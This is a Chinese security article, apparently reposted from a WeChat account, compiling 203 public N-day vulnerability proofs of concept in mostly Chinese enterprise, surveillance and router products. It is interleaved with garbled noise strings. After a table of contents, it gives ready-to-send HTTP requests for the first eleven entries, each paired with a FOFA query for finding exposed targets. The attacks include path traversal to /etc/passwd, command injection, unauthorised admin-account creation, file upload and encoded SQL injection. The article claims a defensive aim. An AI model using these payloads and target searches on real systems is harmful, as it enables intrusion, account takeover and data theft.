互联网公开漏洞整理202309-2024067 W: G6 o# S M* r) X
道一安全 2024-06-05 07:41 北京
+ U* ]# N0 M6 }2 t以下文章来源于网络安全新视界 ,作者网络安全新视界" R2 x: Y' J; d1 F; S
* m) ^% s. t3 z+ b# N发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
6 t( t T( X C# {$ ?2 ^
# c# c1 @8 n/ o a, f8 `漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
; p7 K8 r% I$ y
9 q) `: R0 k# b2 {4 ^4 T安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
' V/ e/ X. Z& i. [5 U$ j* G2 {4 l* ^
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。/ P5 _+ Z' g$ E& M
- S6 |5 i" w* J! h5 Q- \合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
' ^- g4 w* [; i8 x x2 l. ^/ f$ I
( O2 t2 t+ B; ]4 `' {% _" _( W9 ~$ w9 s
声明2 d9 i- u4 B: }2 n0 Y6 L- f
( V7 I0 s5 c& J E, H5 n& C为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
' X+ [3 f1 ?7 B1 i' f. q3 m3 p
: P* Y) v6 Z$ L$ }有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
; c1 i( S3 V& ?9 Q, G9 n7 r. Y: k: H4 l+ _; c! }
8 `( q, j$ N* m1 C
- K. _$ r! n* M0 |3 O! z
目录
( n( g3 J% S( l* I
~0 s U! z, g. P1 G01% Z9 u) E2 y! j* P* B _
9 d9 Q& L% s' }0 _
1. StarRocks MPP数据库未授权访问
$ p, h$ L* h9 |& Y0 f4 u9 i2 ]2. Casdoor系统static任意文件读取
' S# K" W( y$ k! ^3. EasyCVR智能边缘网关 userlist 信息泄漏 x, d2 D1 ?4 J) c" v5 n
4. EasyCVR视频管理平台存在任意用户添加
. J2 x0 B7 i+ N! E" D, ]( F2 d5. NUUO NVR 视频存储管理设备远程命令执行
+ Q( H5 p6 e- ^; Y* x6. 深信服 NGAF 任意文件读取! g3 B* e# f7 t/ s/ }( O
7. 鸿运主动安全监控云平台任意文件下载8 F$ C4 D" e, |- |' ]( L9 B- y
8. 斐讯 Phicomm 路由器RCE
# P3 E5 } d1 x# J0 L9. 稻壳CMS keyword 未授权SQL注入
% v0 m$ n9 p. ?10. 蓝凌EIS智慧协同平台api.aspx任意文件上传/ t9 ]* G B' ]. p9 t. [: V! Y
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
$ T/ |6 D0 m1 ^+ C8 B* U. H, |12. Jorani < 1.0.2 远程命令执行9 t, V: v- u* b
13. 红帆iOffice ioFileDown任意文件读取7 L, p7 y. f3 C! x- ]1 O
14. 华夏ERP(jshERP)敏感信息泄露3 _: J6 `" R5 y+ L# V5 ?9 L
15. 华夏ERP getAllList信息泄露
0 R) m; F5 p8 `. l' ?/ p& V1 S16. 红帆HFOffice医微云SQL注入* } l! [# y( S" D$ w
17. 大华 DSS itcBulletin SQL 注入
0 @3 Y( v+ u1 D3 m! x; S18. 大华 DSS 数字监控系统 user_edit.action 信息泄露 e# A; W3 @/ M
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入4 |$ a& n6 M" a- G
20. 大华ICC智能物联综合管理平台任意文件读取
# `/ K7 [) E0 @, i' B3 i21. 大华ICC智能物联综合管理平台random远程代码执行
+ P h4 m/ y1 E2 e) s22. 大华ICC智能物联综合管理平台 log4j远程代码执行4 d& |7 ~& R! B8 }! Q/ r5 A g, p
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行# r/ u5 Y9 {1 E' L# t( {$ O# Z7 b+ J$ U
24. 用友NC 6.5 accept.jsp任意文件上传
" ^1 `1 f$ {4 n6 W2 R5 [. L0 c25. 用友NC registerServlet JNDI 远程代码执行
0 g4 x' N& j8 S) Y3 `26. 用友NC linkVoucher SQL注入
; w# b( H% e+ |) S4 f+ ]( H& S& |6 Q27. 用友 NC showcontent SQL注入4 D& |3 e }) z. M! Q
28. 用友NC grouptemplet 任意文件上传
# N# P0 M( l k. ~+ ^! f8 _. G. |29. 用友NC down/bill SQL注入3 l* u) }8 q" l4 k" ?
30. 用友NC importPml SQL注入
" _" D" Z# n; i31. 用友NC runStateServlet SQL注入/ X/ G0 o4 {/ e6 w k2 Z! k( j
32. 用友NC complainbilldetail SQL注入0 ]# L7 F0 m$ }; ?* c7 U
33. 用友NC downTax/download SQL注入
& l! Q3 ~& `6 I e5 L34. 用友NC warningDetailInfo接口SQL注入; }; ?% Q3 k* x. l, z$ `
35. 用友NC-Cloud importhttpscer任意文件上传3 p# e6 H% |& y# u. T
36. 用友NC-Cloud soapFormat XXE$ t4 r$ v0 C$ u2 f. l+ a( G/ _
37. 用友NC-Cloud IUpdateService XXE, _. \% W8 O" s5 I% @9 V3 h
38. 用友U8 Cloud smartweb2.RPC.d XXE
6 D, h' H5 {$ Q; h39. 用友U8 Cloud RegisterServlet SQL注入' l/ m- U4 k$ ?7 \4 Y" Y9 L
40. 用友U8-Cloud XChangeServlet XXE
$ Q& H, M3 y8 Q( V! _41. 用友U8 Cloud MeasureQueryByToolAction SQL注入: K0 i# @4 ?9 U$ F1 { ^
42. 用友GRP-U8 SmartUpload01 文件上传% a2 Q$ b7 D/ a B& u- r
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
a2 K0 `; W" [4 n. {9 J44. 用友GRP-U8 bx_dj_check.jsp SQL注入" k8 x: f3 |/ z( Y! a
45. 用友GRP-U8 ufgovbank XXE. a+ v+ v; `0 G) s# D& y
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
. X$ M- q9 x+ `) N9 {47. 用友GRP A++Cloud 政府财务云 任意文件读取
' x* s/ ^/ |1 C8 }; ]7 j48. 用友U8 CRM swfupload 任意文件上传
# d6 T- M1 N: W+ T# e& w' F49. 用友U8 CRM系统uploadfile.php接口任意文件上传; b4 b3 s4 R P7 F0 G; Z
50. QDocs Smart School 6.4.1 filterRecords SQL注入7 L+ e3 j- n" y( ?
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入, O% i \, N9 K$ \
52. 泛微E-Office json_common.php sql注入# @7 z! i8 L* I( S5 m
53. 迪普 DPTech VPN Service 任意文件上传: z8 L7 @% C8 g, d
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
( f4 V2 A- b8 y4 s55. 畅捷通T+ getdecallusers信息泄露; w' e3 _" X% j
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
" G4 _. a4 x( k8 F/ X57. 畅捷通T+ keyEdit.aspx SQL注入
[* Y8 y1 p# c2 e( H8 Y& n+ G58. 畅捷通T+ KeyInfoList.aspx sql注入- ?5 c) g0 V* d) W& D
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
% r% p# Z% s- b! I3 A60. 百卓Smart管理平台 importexport.php SQL注入
8 I% }( Z' h# K; P2 m" [61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
; g9 V! Z6 m, i* r62. IP-guard WebServer 远程命令执行( Y: \" A) u3 Z3 u8 X
63. IP-guard WebServer任意文件读取1 ] I" c5 u6 Z9 \1 T
64. 捷诚管理信息系统CWSFinanceCommon SQL注入& C4 `; c: ]7 z# ~& s
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过- z% F, S( a0 q( \+ R5 D C
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入/ N" P/ Q9 |. T9 V4 I& u; @
67. 万户ezOFFICE wpsservlet任意文件上传' \6 {/ l' T ?5 N$ j
68. 万户ezOFFICE wf_printnum.jsp SQL注入+ t" H& s' g. w9 x: l2 g
69. 万户 ezOFFICE contract_gd.jsp SQL注入
. B. B' x7 H% [7 B& Z70. 万户ezEIP success 命令执行4 m" X' W0 t" C/ y3 K1 J0 c, R/ u
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
( ]0 o3 Y9 Q; F' ^ I; D0 i3 x/ x72. 致远OA getAjaxDataServlet XXE
& B/ A6 I8 ?' _$ W/ m1 ?73. GeoServer wms远程代码执行
9 }) Z9 X- z. H% r0 g: k; u74. 致远M3-server 6_1sp1 反序列化RCE) k. W0 c( \ l" X
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
% m) W& V7 S( i6 W9 g, i76. 新开普掌上校园服务管理平台service.action远程命令执行
% E% P) G' L3 ^77. F22服装管理软件系统UploadHandler.ashx任意文件上传
. M& m: m1 V: u i( d* Y% x( G78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传( g" z+ W/ s/ D6 s
79. BYTEVALUE 百为流控路由器远程命令执行7 n0 C# R0 b. y" K* I* N, t' d% i$ G
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传3 c3 m5 T# s c: z
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露3 [2 T/ _' K4 c
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行, \# O/ E E0 _: J
83. JeecgBoot testConnection 远程命令执行
- t; S- g# k( S3 s- N' \; a$ d- G84. Jeecg-Boot JimuReport queryFieldBySql 模板注入, `( m/ J9 Q6 R! M' p5 l1 x7 s
85. SysAid On-premise< 23.3.36远程代码执行
# T3 `1 S5 U' N5 V9 k: R3 l86. 日本tosei自助洗衣机RCE
# j! Y- Y: [4 I87. 安恒明御安全网关aaa_local_web_preview文件上传$ |* n7 ]8 G( N+ ^2 t, E& \
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行0 S$ c: s# U4 s
89. 致远互联FE协作办公平台editflow_manager存在sql注入% `* c3 i6 A# ]- i
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
9 _* M2 ^6 v# V5 @0 I' Y91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
n7 \- u3 l7 d$ {: @% ^92. 海康威视运行管理中心session命令执行
" }3 d! D4 S( O! `" _" V U93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
3 d8 X" i# u. y/ r+ y; V94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传2 l) S& r; M: h+ S# {% Q6 ?
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行% p Y7 k! `4 m) N- x" X
96. Apache OFBiz 18.12.11 groovy 远程代码执行
R! W( L. ~0 L7 g" T7 r# Z* A97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
% v3 z/ p9 f" w/ q98. SpiderFlow爬虫平台远程命令执行
/ `5 O0 L d. @99. Ncast盈可视高清智能录播系统busiFacade RCE" Q! R# I0 g# }. d5 C) C& ~
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传5 q# n) L. z( x4 P3 M
101. ivanti policy secure-22.6命令注入
7 E6 G- p; D0 W$ V102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行3 r# G& F0 B! e
103. Ivanti Pulse Connect Secure VPN XXE
{9 E8 w1 V6 r104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
; n& q) }+ [2 Z" v" @: C2 _1 x* g) [2 Z105. SpringBlade v3.2.0 export-user SQL 注入
1 z7 W2 B% A; u6 {$ a106. SpringBlade dict-biz/list SQL 注入6 G9 L3 |; x! g4 B; r! }8 N+ l
107. SpringBlade tenant/list SQL 注入% d. B8 s" f+ Y3 I
108. D-Tale 3.9.0 SSRF+ s' w: k) Z* w/ d( @
109. Jenkins CLI 任意文件读取
3 J0 B7 ^9 ]4 [. ]" r110. Goanywhere MFT 未授权创建管理员
2 K. E6 f1 n% f/ G111. WordPress Plugin HTML5 Video Player SQL注入
3 ?! e" ?6 V8 T& M+ z; m/ S) B112. WordPress Plugin NotificationX SQL 注入
( \" q* C( F# l113. WordPress Automatic 插件任意文件下载和SSRF% m" e r3 Q" j8 R/ [; M
114. WordPress MasterStudy LMS插件 SQL注入
7 ]: {5 E0 b# A$ e8 l& A115. WordPress Bricks Builder <= 1.9.6 RCE
?5 ]( [ R; B$ h' H116. wordpress js-support-ticket文件上传) ^5 r. s! {8 a" C8 N: H
117. WordPress LayerSlider插件SQL注入' h' N( i w" H9 {4 O
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传# d0 `: I! q4 X
119. 北京百绰智能S20后台sysmanageajax.php sql注入% B. W- q- g, |# Q2 D) S
120. 北京百绰智能S40管理平台导入web.php任意文件上传
6 F# _3 E+ d6 X" B( e) r, `5 E4 k121. 北京百绰智能S42管理平台userattestation.php任意文件上传
2 ^! h) }1 x! I( S9 S# y122. 北京百绰智能s200管理平台/importexport.php sql注入
+ j+ W. K, c6 b5 M/ [123. Atlassian Confluence 模板注入代码执行' H) V) q/ }4 q) i
124. 湖南建研工程质量检测系统任意文件上传
- S' L0 G! V/ v: ^& L% N; p5 f+ G125. ConnectWise ScreenConnect身份验证绕过5 \/ U. k$ o, g5 `+ n$ V$ m6 d* l
126. Aiohttp 路径遍历
* `+ D: k6 k- U0 A127. 广联达Linkworks DataExchange.ashx XXE6 r2 W7 D7 E) v9 x
128. Adobe ColdFusion 反序列化+ H$ `! J [- Q% H5 j
129. Adobe ColdFusion 任意文件读取, k$ y7 Y3 G5 z
130. Laykefu客服系统任意文件上传2 G% G( ]9 U# N6 r
131. Mini-Tmall <=20231017 SQL注入
/ F3 G2 T2 N# @8 Z- |3 R3 K- P132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
\2 F5 i, u) G5 U( [4 A) K3 E133. H5 云商城 file.php 文件上传
6 \+ Y- _ ~( w" W7 N134. 网康NS-ASG应用安全网关index.php sql注入* H2 F( \2 z. h* s! e4 e) w
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
0 Y( }3 i/ V0 K- h d l" [136. NextChat cors SSRF
! t4 ]' G6 W9 c+ x, K7 t137. 福建科立迅通信指挥调度平台down_file.php sql注入
( U2 A( d' z' J) Q# ?& h1 m138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
c' g9 u: p' ~& T) E4 P; \7 Y139. 福建科立讯通信指挥调度平台editemedia.php sql注入
. k8 i! q: C m( `* r140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
# ?( Y( j8 n6 n% S6 W# o1 R/ f141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入9 m; N5 z: _5 w' W! b! H& g1 q( A3 U
142. CMSV6车辆监控平台系统中存在弱密码. o. ] D3 o0 {+ A( C% F, E2 ~+ g/ \
143. Netis WF2780 v2.1.40144 远程命令执行
1 @5 J$ |8 E8 l' B' W" w144. D-Link nas_sharing.cgi 命令注入
# s4 p, t+ f: e. \) q0 C* L145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
# R5 c. U3 \9 ?: Q: b7 H6 Q146. MajorDoMo thumb.php 未授权远程代码执行
! L. S, _+ N( \$ N6 }& Z0 e/ i- C147. RaidenMAILD邮件服务器v.4.9.4-路径遍历8 m: y* d# s$ F( X( X* `
148. CrushFTP 认证绕过模板注入
+ V' l- O. a$ n. k" b% d149. AJ-Report开源数据大屏存在远程命令执行
3 i6 i' Z! }- z3 G150. AJ-Report 1.4.0 认证绕过与远程代码执行
/ k0 C) N5 \" p2 z% Y8 p! }151. AJ-Report 1.4.1 pageList sql注入" g- Q/ L1 C5 E# P
152. Progress Kemp LoadMaster 远程命令执行
# H2 V5 G9 u' T4 \1 O153. gradio任意文件读取% `9 L, q# y' C: t! W x
154. 天维尔消防救援作战调度平台 SQL注入" T7 M, ], W. n. b/ m
155. 六零导航页 file.php 任意文件上传
# { z& `4 o2 M7 U156. TBK DVR-4104/DVR-4216 操作系统命令注入# ^$ g% u Q( {. T3 b4 W
157. 美特CRM upload.jsp 任意文件上传
, F( u# a- _, n158. Mura-CMS-processAsyncObject存在SQL注入
" {8 C) \% l* m. P159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传0 t6 Z+ @3 c/ {( q! e8 H
160. Sonatype Nexus Repository 3目录遍历与文件读取. j5 T4 J9 t5 \7 y
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
" b) L# X$ K3 G- W o5 _0 H162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传* f+ O" q$ |) S9 N& C
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传* M; g" G- p6 d! T8 c
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传, r, u5 n- K1 Y! Q2 S
165. OrangeHRM 3.3.3 SQL 注入
' m" ?8 o9 B2 q166. 中成科信票务管理平台SeatMapHandler SQL注入 n" z8 I p1 m" X& H `' E$ l
167. 精益价值管理系统 DownLoad.aspx任意文件读取
0 Q' h5 |5 i3 ?- x6 E- z168. 宏景EHR OutputCode 任意文件读取- ^* d G5 J( c- X0 h$ v% j
169. 宏景EHR downlawbase SQL注入
3 }/ T/ H- \9 X+ @( c; d170. 宏景EHR DisplayExcelCustomReport 任意文件读取" T/ U4 y3 @. u: a% e
171. 通天星CMSV6车载定位监控平台 SQL注入
1 [: c6 Y: C9 ^' d# c& i' V9 C172. DT-高清车牌识别摄像机任意文件读取+ _- e9 E" V4 ^5 R8 T
173. Check Point 安全网关任意文件读取
$ O3 f8 o2 ~0 Y. i* T8 y, o- u174. 金和OA C6 FileDownLoad.aspx 任意文件读取
8 c7 x0 l# G* L8 i1 ?4 p175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
/ w8 g& ^4 I# J0 z: v( c176. 电信网关配置管理系统 rewrite.php 文件上传
7 r% {5 U) M, a177. H3C路由器敏感信息泄露
9 k6 H, Y. a6 W178. H3C校园网自助服务系统-flexfileupload-任意文件上传
" H1 e$ J0 E. i179. 建文工程管理系统存在任意文件读取& A; J7 m% [/ ?4 T8 H/ U [
180. 帮管客 CRM jiliyu SQL注入5 w* r; }0 G& \$ D2 u8 N
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
* ], _0 Y: B' r0 @182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建1 K9 I. _0 G7 g. g
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
: t/ k, V2 E% o( X7 L184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加% _* D6 g4 l' N' F b9 G+ d
185. 瑞友天翼应用虚拟化系统SQL注入
! ^% W1 a7 C# _, U s) r% G6 p1 R7 X C186. F-logic DataCube3 SQL注入
+ q T' x" p- f1 P/ H187. Mura CMS processAsyncObject SQL注入, [3 E; E/ h7 s7 }9 c) m# j
188. 叁体-佳会视频会议 attachment 任意文件读取& P" w2 b+ f% f1 F! _2 T
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
$ c9 R3 S+ |- R" b' K4 `( X190. 短视频矩阵营销系统 poihuoqu 任意文件读取
: N6 K) F+ ?& r! u3 c" P& C191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入6 }0 }1 l/ b9 i6 u+ h9 [ O- O0 l
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传" f' d- b; L/ N
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
. D6 o3 D+ c; r194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传) s) i9 z7 s, J+ y, {. |0 m6 c& |
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行% h& ^3 x# e8 w" [# F
196. 河南省风速科技统一认证平台密码重置
4 F/ b5 j. R' T& B+ c/ H" O5 ~197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
; X1 t( ~; c1 q7 P4 w5 J198. 阿里云盘 WebDAV 命令注入
3 }( P2 `2 @% i199. cockpit系统assetsmanager_upload接口 文件上传
: p" n& F3 }1 x x; Q: e z200. SeaCMS海洋影视管理系统dmku SQL注入
4 j6 T5 t, E0 o; ^: T U- R6 o1 {201. 方正全媒体新闻采编系统 binary SQL注入
# y: t$ f Z. e202. 微擎系统 AccountEdit任意文件上传4 M7 P: v) I3 u
203. 红海云EHR PtFjk 文件上传
, H% P g2 M& x- W/ P, o- s3 j
# A. Q( [ q$ |2 E* MPOC列表
( z% p+ {- Z4 ?" e
( B( h9 Z7 F7 y' p1 S& w- K; g+ p! Q02
?) y7 G4 i$ k6 Q6 c" E5 N0 Y* i
' C% J# B$ f; I1. StarRocks MPP数据库未授权访问
1 B! m. G h: R- V3 tFOFA :title="StarRocks"/ G( n# Z, _! C
GET /mem_tracker HTTP/1.1) X" y3 u9 q6 |- y
Host: URL
0 ?4 x, z2 }. g' Y7 T8 {' T
9 _* W; x8 H/ W: B* j
1 W9 y6 X: e8 L2 D2. Casdoor系统static任意文件读取) b8 n7 d# U# E. a0 \
FOFA :title="Casdoor"
. _' b" T! g# S/ Y+ e. T8 \( FGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1" g" w" @' `1 p, [- j8 Q2 f
Host: xx.xx.xx.xx:9999% U0 I9 g9 G( F6 x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36# j* d9 r) O* G2 c% c
Connection: close* E- J- e% d" \# M3 w
Accept: */*# I) h Z- y, |( _! a
Accept-Language: en+ s: [9 E b. \
Accept-Encoding: gzip
8 [( |4 z: m5 k8 M. L; X
: m0 A1 a/ ~* Q, ]* R, x' x, I3 ~. w H1 G5 S- _5 k
3. EasyCVR智能边缘网关 userlist 信息泄漏
/ O# r0 C- {7 f' gFOFA :title="EasyCVR"4 M+ @0 n/ C7 Z- u4 F% ^
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1) O8 ~2 [3 S1 k/ y3 l/ g& }: ]. Q+ G
Host: xx.xx.xx.xx
6 R* @6 [! f6 s2 Q" ` H# t& ?
8 b4 B; m( [1 J& O6 m. i: r! h) P+ q3 u3 k7 w0 C
4. EasyCVR视频管理平台存在任意用户添加6 B! _1 y! U# i9 T- s4 P+ v; D8 y5 m
FOFA :title="EasyCVR"2 W$ ]% _$ Y7 G$ b1 ~% V2 H
( }' `3 F9 }% Z% Zpassword更改为自己的密码md5
* S: g- [! A' @) D' WPOST /api/v1/adduser HTTP/1.1
/ k4 z4 u) U* L; n& a* z* GHost: your-ip( j% U4 C$ m5 k) o! D
Content-Type: application/x-www-form-urlencoded; charset=UTF-86 {. x+ B; |7 a+ y, n
. Z% M* Z3 o3 z: v' e+ c6 f# W ~5 H
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
2 B! z$ I4 A6 C& J9 O* ?3 t- X# x$ f/ Y, j( S# ^4 M0 w- @
- y) v0 x* z3 i; B4 J( {3 f7 O
5. NUUO NVR 视频存储管理设备远程命令执行) y/ u5 H y+ P
FOFA:title="Network Video Recorder Login"( j% s5 E) w) G* \
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
! v n9 m6 j# L: @9 X( u8 k% Z1 bHost: xx.xx.xx.xx$ L {: ?: n% P
7 g @, b$ F! F' I5 o* p: g& K/ x
6. 深信服 NGAF 任意文件读取
" R9 \4 ]; \0 u" n0 ZFOFA:title="SANGFOR | NGAF"9 Z% ]4 ]4 v: T# y6 D) `* e* u
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
! ]% K$ I: R2 H1 h" o& N( _; sHost:, {; x- @7 S n: @: \" b
2 O1 h! x2 I: d; _" O3 U$ u) ?* l2 d/ v5 _" N1 [1 V$ o9 u
7. 鸿运主动安全监控云平台任意文件下载
% o( R% M; |& p2 e% z1 `; ]FOFA:body="./open/webApi.html"7 d1 T0 E- ]+ e! m2 ~
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
! T T N1 J. D( `; t# BHost:) q% ?. f8 }0 Y9 ?: X
: a% O" K0 B7 |) |- A5 M; `' l! z
& S+ g; s7 ^3 x8 Y, q8. 斐讯 Phicomm 路由器RCE
, G. c3 k. Z2 W5 h$ ZFOFA:icon_hash="-1344736688"0 _& g5 j5 L$ u' j7 c
默认账号admin登录后台后,执行操作
( Q- Y. }5 u: m! y7 RPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
9 @- r9 K/ [" {! Q: @/ UHost: x.x.x.x
+ o* J9 Y7 _- z6 r& n+ ICookie: sysauth=第一步登录获取的cookie, p' \0 x8 q0 A }* |/ E8 S2 V& h. n
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz: o2 \6 k; f5 u' p4 L
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
# e6 w, @: u3 f2 l
$ ?; t4 N) T: F7 @- L------WebKitFormBoundaryxbgjoytz0 O( K# P7 B" N
Content-Disposition: form-data; name="wifiRebootEnablestatus"
6 |0 P" [% J! Y1 o- L3 @+ K, t! z, f/ R
%s3 L9 A' n$ G; e. K+ e
------WebKitFormBoundaryxbgjoytz
# H4 ?! g: A; \Content-Disposition: form-data; name="wifiRebootrange"* m# [6 g1 e5 P( B
8 m9 W3 U" ]* q* n6 |+ Z$ R
12:00; id;. d2 i" u" \. I, z% S L' E
------WebKitFormBoundaryxbgjoytz
% u R0 |- V# E$ z# i1 }, P2 AContent-Disposition: form-data; name="wifiRebootendrange"& j5 S; j% ?& v7 k
3 W* L- {5 S8 `2 @# M8 `/ Y+ m# s%s: G' h! G# `, y; N' J
------WebKitFormBoundaryxbgjoytz
+ A- q# M" u4 O1 l6 C% SContent-Disposition: form-data; name="cururl2": Q8 c: Q) Q4 G; ~- w
! _& C# c, [0 ?, g; R. C) F8 ]
n5 c/ [8 B2 o+ N$ g' o
------WebKitFormBoundaryxbgjoytz--
D2 P. i- l: E5 E' B( |; ]* J5 N4 O l* b2 a) j: B
+ o; ?8 W# ~2 o3 F; }9. 稻壳CMS keyword 未授权SQL注入
: N g" E2 [, a- N: @. DFOFA:app="Doccms"6 z: g v; X4 ^! }) _
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.11 i1 o+ [5 }5 u( q
Host: x.x.x.x/ u7 ^& ^/ i* u H$ T
1 u _' G- O. B. Y9 l8 B4 I
* F* L4 G/ m2 z" ~$ I
payload为下列语句的二次Url编码) G6 u8 t }+ I3 C, g
2 _4 M' X0 G9 s# Z' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
- }) L/ D7 [9 F) Y
) I" s/ q( k; l' d, x" x10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
/ b& ?. z0 r+ H. F0 AFOFA:icon_hash="953405444"
+ }# t$ [2 I9 Z8 u
" M Q, ?3 ?" J: b1 k文件上传后响应中包含上传文件的路径% a% X! i: j# r" V5 b0 H5 [9 Y: j
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
[. W# V, s1 R6 X4 Y; \3 T: M QHost: x.x.x.x:xx
1 O3 p% k6 Y/ N% n" J5 h) |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.360 e1 O2 Q% V) T' x2 l1 n& n# S# H; \
Content-Length: 197
3 F1 v" q8 {' Q/ S/ @( IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.92 G$ a+ m8 P6 [
Accept-Encoding: gzip, deflate/ R6 U. c$ T1 U* a' u
Accept-Language: zh-CN,zh;q=0.9) M( V! N e3 o( G0 J' Q
Connection: close
* K9 c' m) `5 |1 c7 K' s# JContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu9 y8 f6 u: s$ w, f: L4 E/ y3 E) G
" ]% H8 h% Y; G0 m3 w------WebKitFormBoundaryxdgaqmqu
% ]% I& ~! n- Q( AContent-Disposition: form-data; name="file"filename="icfitnya.txt"
# \$ _+ H% K% P+ F5 A6 [; n0 W2 y( \Content-Type: text/html8 e1 a; E8 m( M: w$ B0 Z0 W* B. a
# s$ t' B e' E" m- p$ @" V
jmnqjfdsupxgfidopeixbgsxbf& ?9 G9 y0 t' v& N/ o
------WebKitFormBoundaryxdgaqmqu--
4 L( Y2 e% G6 ^5 v4 B3 H, {7 Y, Z) K/ }& o/ D2 Z
1 Z& Q) }3 h; A/ G
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
- t) s; x, }9 @FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"6 H5 g: E* o4 V/ W- o
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.17 w# J- h1 b& g* p8 v
Host: 127.0.0.13 [2 W C1 q3 s4 c, U5 i3 F
Pragma: no-cache
